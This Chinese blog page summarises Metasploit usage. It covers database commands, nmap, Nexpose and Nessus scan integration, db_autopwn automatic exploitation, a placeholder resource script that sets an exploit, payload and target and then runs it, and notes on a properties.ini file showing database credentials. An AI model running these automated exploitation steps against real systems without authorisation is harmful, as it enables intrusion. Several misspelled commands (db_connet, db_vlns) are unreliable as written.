您的位置:首页 > 编程语言 > ASP

metasploit 常用命令汇总

2015-12-21 17:00 597 查看
1.连接数据并显示一些信息


db_connet username:password@ip address/database name

db_destroy 同上

db_import 文件名字

db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数

db_vlns // 显示漏洞名字



2.nmap扫描


db_nmap -sS -nP ip address

db_nmap -h



3.nexpose在metasploit的使用


load nexpose // 加载nexpose插件

nexpose -h

nexpose_connect 用户名:密码@ip地址:端口号 认证字符

nexpose_scan ip地址

db_hosts -c address // 显示漏洞信息


4.nessus在metasploit的使用


load nessus

nessus_connect 用户名:密码@ip地址:端口号 认证字符

nessus_policy_list //显示策略列表

nessus_scan_new

nessus_scan_new 2 bridge_scan ip地址

nessus_scan_status //显示状态

nessus_report_list // 报告列表

nessus_report_get 报告名字 // 显示报告

db_hosts -c address,svcs,vlns

db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞


5.搜索漏洞

search mysql // 搜索mysql的漏洞

6.保存metasploit用过的命令到文件


makerc 路径/文件名字


自动审计,运行检测

7.脚本如下

echo use 漏洞名字 >autoexploit.rc
echo set RHOST IP地址 >> autoexploit.rc
echo set PAYLOAD shellcode名字 >> autoexploit.rc
echo set LHOST IP地址 >> autoexploit.rc
echo exploit >> autoexploit.rc


8.第1种运行脚本的方法:

msfconsole -r autoexploit.rc


9.第2种运行脚本的方法:

msfconsole
resource autoexploit.rc

10.配置文件说明

<1>.metasploit的全局配置文件在安装目录下,文件名为properties.ini

<2>.properties.ini的信息如下:


[General] // metasploit通用设置栏

base_stack_name=Metasploit

base_stack_version=4.3.0

installdir=D:\metasploit //matasploit 安装路径

[Postgres] // postgresql数据库栏

postgres_binary_directory=D:\metasploit/postgresql/bin //postgresql数据库bin路径

postgres_port=7337 //postgresql数据库的端口号

postgres_root_directory=D:\metasploit/postgresql //postgresql数据库的数据目录

postgres_root_password=b83a7446 //postgresql数据库的默认账户为postgres,默认密码就是此栏

postgres_unique_service_name=metasploitPostgreSQL-1 //postgresql数据库的服务名

rapid7_database_password=20f25188

rapid7_database_user=msf3 //postgresql数据库中的新建的账号为msf3,密码为20f25188

[Ruby]

ruby_root_directory=D:\metasploit/ruby // ruby的安装目录

[NginX] // nginx服务器设置

nginx_ssl_days=3650

nginx_ssl_name=goodjob-PC

nginx_ssl_port=3790 // nginx服务器的端口号

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: